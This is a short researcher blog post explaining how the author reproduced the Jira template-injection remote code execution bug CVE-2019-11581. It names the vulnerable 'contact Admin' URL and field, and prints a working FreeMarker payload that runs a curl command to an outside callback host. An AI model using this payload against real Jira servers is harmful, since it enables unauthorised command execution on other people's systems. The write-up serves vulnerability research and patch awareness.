RCE in Jira(CVE-2019–11581)

ruvlol
2 min readJul 13, 2019

--

Hello, community.

So, here I will share info about new critical vulnerability in Jira server. It was not originally found by me. 4 days ago at evening I found a security advisory which claimed that critical security hole existed in Jira. The very next morning I researched and had working exploit.

It wasn’t hard to find a working exploit since Atlassian shared almost all needed info in advisory. It said that “bulk email send“ and “contact Admin” functionalities were affected by server side template injection. “Bulk email send” was immediately discarded since it requires Admin priveledges to exploit. As about next one, “contact Admin”, it is exploitable if these conditions met:

  1. such functionality was turned on. It is turned off by default.
  2. Jira is not covered with ACL, firewall or SSO provider which prevents unauthenticated access.

I installed my own trial Jira, turned “contact Admin” on and started testing.

The “contact Admin” functinality is accessible on this URL:

https://jiraserver/secure/ContactAdministrators!default.jspa

And if invoked from UI, the button is:

Now let’s figure out the payload. Jira uses freemarker template engine, which I am familiar with. The first thing I tried is insert known payload into all fields.

The payload was:

$i18n.getClass().forName('java.lang.Runtime').getMethod('getRuntime',null).invoke(null,null).exec('curl http://avtohanter.ru/rcetest?a=a').waitFor()

pasted in contact form:

Then I immediately received a bunch of curl callbacks on my host, which confirmed the vulnerability.

Later it turned that only “Subject” field is vulnerable, so you could be more precise with testing.

Hope that will help!

By the way, I have patreon where I am writing infosec articles. If you are interested you can check it out on https://www.patreon.com/ruvlol , I am working hard to make it a good source of ethical hacking exprience, a lot of articles are coming there including research writeups.

--

--

Responses (3)